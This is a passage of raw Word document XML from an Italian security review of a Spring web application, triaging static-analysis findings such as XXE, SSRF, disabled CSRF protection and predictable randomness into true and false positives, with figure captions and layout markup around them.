                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>This API (java/io/File.&lt;init&gt;(Ljava/lang/String;)V) reads a file whose location might be specified by user input</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005422F3" w14:paraId="285270EF" w14:textId="77777777" w:rsidTr="005422F3">
        <w:trPr>
          <w:trHeight w:val="731"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C51993C" w14:textId="706052E1" w:rsidR="004C5F9A" w:rsidRPr="005422F3" w:rsidRDefault="005422F3" w:rsidP="00792C82">
            <w:bookmarkStart w:id="1" w:name="_Hlk169013389"/>
            <w:r w:rsidRPr="005422F3">
              <w:rPr>
                <w:rFonts w:cs="Noto Sans"/>
              </w:rPr>
              <w:t xml:space="preserve">XML parsing vulnerable to XEE </w:t>
            </w:r>
            <w:bookmarkEnd w:id="1"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1141" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21706C1D" w14:textId="00313DB0" w:rsidR="004C5F9A" w:rsidRDefault="004C5F9A" w:rsidP="00792C82">
            <w:r w:rsidRPr="00C56823">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>True positive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2604" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70F05BCA" w14:textId="5247D6BE" w:rsidR="004C5F9A" w:rsidRDefault="005422F3" w:rsidP="00792C82">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:cs="Noto Sans"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>HobbyController.java</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FFE4A9E" w14:textId="703A270C" w:rsidR="004C5F9A" w:rsidRDefault="005422F3" w:rsidP="00792C82">
            <w:r>
              <w:t>134</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69818183" w14:textId="5E0BD8C3" w:rsidR="004C5F9A" w:rsidRDefault="005422F3" w:rsidP="00792C82">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:cs="Noto Sans"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>The use of DocumentBuilder.parse(...) (DocumentBuilder) is vulnerable to XML External Entity attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005422F3" w14:paraId="545E7D7F" w14:textId="77777777" w:rsidTr="005422F3">
        <w:trPr>
          <w:trHeight w:val="731"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DC33B57" w14:textId="0C636624" w:rsidR="004C5F9A" w:rsidRDefault="005422F3" w:rsidP="00792C82">
            <w:bookmarkStart w:id="2" w:name="_Hlk169013455"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:cs="Noto Sans"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>URlConnection Server-Side Request forgery (SSRF) and File Disclosure</w:t>
            </w:r>
            <w:bookmarkEnd w:id="2"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1141" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45C8737D" w14:textId="3156964F" w:rsidR="004C5F9A" w:rsidRDefault="004C5F9A" w:rsidP="00792C82">
            <w:r w:rsidRPr="00C56823">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>True positive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2604" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3603580E" w14:textId="7F7496D3" w:rsidR="004C5F9A" w:rsidRDefault="005422F3" w:rsidP="00792C82">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:cs="Noto Sans"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>HomeController.java</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3955DC2A" w14:textId="3120BC7C" w:rsidR="004C5F9A" w:rsidRDefault="005422F3" w:rsidP="00792C82">
            <w:r>
              <w:t>76</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DEC1140" w14:textId="67F34AD7" w:rsidR="004C5F9A" w:rsidRDefault="005422F3" w:rsidP="00792C82">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:cs="Noto Sans"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>This web server request could be used by an attacker to expose internal services and filesystem.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0354B511" w14:textId="77777777" w:rsidR="004C5F9A" w:rsidRDefault="004C5F9A" w:rsidP="00792C82"/>
    <w:p w14:paraId="65AE3285" w14:textId="5E8A6F84" w:rsidR="004C5F9A" w:rsidRDefault="00FD7204" w:rsidP="00792C82">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251917312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="18D0C8E9" wp14:editId="7FE4F6D0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>408940</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7214235" cy="1699260"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="153430129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235" cy="1699260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>L’analisi di Snyk invece ha riportato una vulnerabilità nel front-end che è la seguente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5CC7D6" w14:textId="53BB9686" w:rsidR="00FD7204" w:rsidRDefault="00FD7204" w:rsidP="00792C82"/>
    <w:p w14:paraId="7FC0A7CE" w14:textId="1743B531" w:rsidR="00FD7204" w:rsidRDefault="00FD7204" w:rsidP="00792C82"/>
    <w:p w14:paraId="16B04849" w14:textId="77777777" w:rsidR="004C5F9A" w:rsidRDefault="004C5F9A" w:rsidP="00792C82"/>
    <w:p w14:paraId="258E24A7" w14:textId="77777777" w:rsidR="004C5F9A" w:rsidRDefault="004C5F9A" w:rsidP="00792C82"/>
    <w:p w14:paraId="5BB665EC" w14:textId="77777777" w:rsidR="004C5F9A" w:rsidRDefault="004C5F9A" w:rsidP="00792C82"/>
    <w:p w14:paraId="29C51F02" w14:textId="77777777" w:rsidR="004C5F9A" w:rsidRDefault="004C5F9A" w:rsidP="00792C82"/>
    <w:p w14:paraId="37960801" w14:textId="77777777" w:rsidR="004C5F9A" w:rsidRDefault="004C5F9A" w:rsidP="00792C82"/>
    <w:p w14:paraId="245928F8" w14:textId="772A2986" w:rsidR="00844BCD" w:rsidRDefault="00245DF3" w:rsidP="00792C82">
      <w:r>
        <w:t xml:space="preserve">Di seguito è mostrato l’elenco e la spiegazione nel dettaglio di tutte le vulnerabilità. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053803F6" w14:textId="5E4A8F0E" w:rsidR="00C53044" w:rsidRDefault="00C53044" w:rsidP="00792C82"/>
    <w:p w14:paraId="7C8DE375" w14:textId="56F1A02B" w:rsidR="00922898" w:rsidRPr="00631C73" w:rsidRDefault="00C53044" w:rsidP="005F3B18">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00922898" w:rsidRPr="0006778F">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Falsi positivi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41306172" w14:textId="71A6D4D6" w:rsidR="00922898" w:rsidRPr="00C53044" w:rsidRDefault="00C53044" w:rsidP="0006778F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C53044">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Spring CSRF protection disabled (Cross-Site Request Forgery)</w:t>
      </w:r>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41687700"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r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bearer Token</w:t>
      </w:r>
      <w:r>
        <w:t>, i quali non sono automaticamente inclusi nelle richieste Cross-Site. Di fatti, a differenza dei cookie di sessione, questi Token non vengono inviati automaticamente dal browser con ogni richiesta, bensì devono essere inclusi esplicitamente nell’Authorization Header della richiesta http. Inoltre</w:t>
      </w:r>
      <w:r w:rsidR="0006778F">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> l’applicazione fa uso di una politica CORS che accetta richieste soltanto da domini specifici, rendendo quindi la vulnerabilità un falso positivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E67AF4E" w14:textId="232EC027" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251932672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="538E67BE" wp14:editId="0CAAEEC8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-540385</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1851025</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7195185" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="3225053" name="Casella di testo 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0FFE206D" w14:textId="36082704"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>1</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: SecurityConfiguratio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E67BE" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Casella di testo 1" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-42.55pt;margin-top:145.75pt;width:566.5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o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T7HY+u5lzJil3/X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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0FFE206D" w14:textId="36082704"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>1</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: SecurityConfiguration.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251930624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B5EA0FF" wp14:editId="25F50C4D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>120650</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7195475" cy="1673801"/>
            <wp:effectExtent l="0" t="0" r="5715" b="3175"/>
            <wp:wrapNone/>
            <wp:docPr id="722038081"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475" cy="1673801"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="566AFE1E" w14:textId="4068B715" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60C21FA7" w14:textId="5FB2623E" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04896035" w14:textId="5B8629F9" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB0F51B" w14:textId="5C888FA3" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="400D6E89" w14:textId="6FD43FC4" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F77A3D9" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A044E5D" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39459885" w14:textId="104ADF0B" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>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r w:rsidRPr="005E267F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Unexpected property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32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E2E649" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="005E267F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB9AE82" w14:textId="6A22816A" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Questa vulnerabilità si ha quando vengono esposti dei dati sensibili degli oggetti all’esterno, mostrando informazioni non necessarie e violando la privacy. Nel nostro caso alcuni sono risultati in dei falsi positivi e altri in veri positivi, trattati in seguito.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ED2ECB" w14:textId="24651193" w:rsidR="00922898" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Il m</w:t>
      </w:r>
      <w:r w:rsidR="00922898">
        <w:t xml:space="preserve">etodo </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">analizzato è </w:t>
      </w:r>
      <w:r w:rsidR="00922898" w:rsidRPr="005E267F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hobbiesShow(</w:t>
      </w:r>
      <w:r w:rsidR="00922898">
        <w:t xml:space="preserve">) in </w:t>
      </w:r>
      <w:r w:rsidR="00922898" w:rsidRPr="005E267F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HomeController</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> e risulta un </w:t>
      </w:r>
      <w:r w:rsidR="00922898">
        <w:t xml:space="preserve"> false positive perché tutti gli attributi dell’oggetto vengono utilizzati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, come mostrato in Figura </w:t>
      </w:r>
      <w:r w:rsidR="007A6099">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nella schermata del browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7328E2B5" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B183EB0" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75590FDC" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60C591E5" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="041A216C" w14:textId="2337B80F" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251935744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2B9CDE1C" wp14:editId="7DF2B3A5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-211455</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>727075</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6542405" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1472552058" name="Casella di testo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75D5B96E" w14:textId="20616847" w:rsidR="007A6099" w:rsidRPr="00B71CBA" w:rsidRDefault="007A6099" w:rsidP="007A6099">
                            <w:pPr>
                              <w:pStyle w:val="Didascalia"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figura</w:t>
                            </w:r>
                            <w:r w:rsidR="007239A2">
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="begin"/>
                            </w:r>
                            <w:r>
                              <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="separate"/>
                            </w:r>
                            <w:r w:rsidR="00870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>2</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E1C" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-16.65pt;margin-top:57.25pt;width:515.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T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b2c30ZjzjTFLs9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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="75D5B96E" w14:textId="20616847" w:rsidR="007A6099" w:rsidRPr="00B71CBA" w:rsidRDefault="007A6099" w:rsidP="007A6099">
                      <w:pPr>
                        <w:pStyle w:val="Didascalia"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figura</w:t>
                      </w:r>
                      <w:r w:rsidR="007239A2">
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r>
                        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="00870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>2</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: HomeController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251933696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="685EDAEA" wp14:editId="08A6BC63">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-488315</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6542679" cy="1158240"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="185686984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679" cy="1158240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="628B7E56" w14:textId="2E1D5C31" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25147682" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0022D853" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FB6EA4D" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="007A6099"/>
    <w:p w14:paraId="028E261B" w14:textId="5DEB2094" w:rsidR="00922898" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251740160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5783EBA1" wp14:editId="0C36B92E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-63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r w:rsidR="005E267F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251752448" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="328EFB1F" wp14:editId="374300E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0D55F172"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>3</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28"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9h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eL2dnH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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="59AB499D" w14:textId="0D55F172"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>3</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Schermata web developer con informazioni dell'hobby</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>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6AE5999D" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898"/>
    <w:p w14:paraId="7A854324" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898"/>
    <w:p w14:paraId="3FB172E6" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898"/>
    <w:p w14:paraId="27D77E40" w14:textId="77777777" w:rsidR="00922898" w:rsidRPr="005E267F" w:rsidRDefault="00922898" w:rsidP="005E267F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E267F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Predictabl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randomicità. Si dovrebbero invece utilizzare i True Random Number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01EA2AE7" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36581C16" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70093991" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="408D4151" w14:textId="37C3A982" w:rsidR="00922898" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
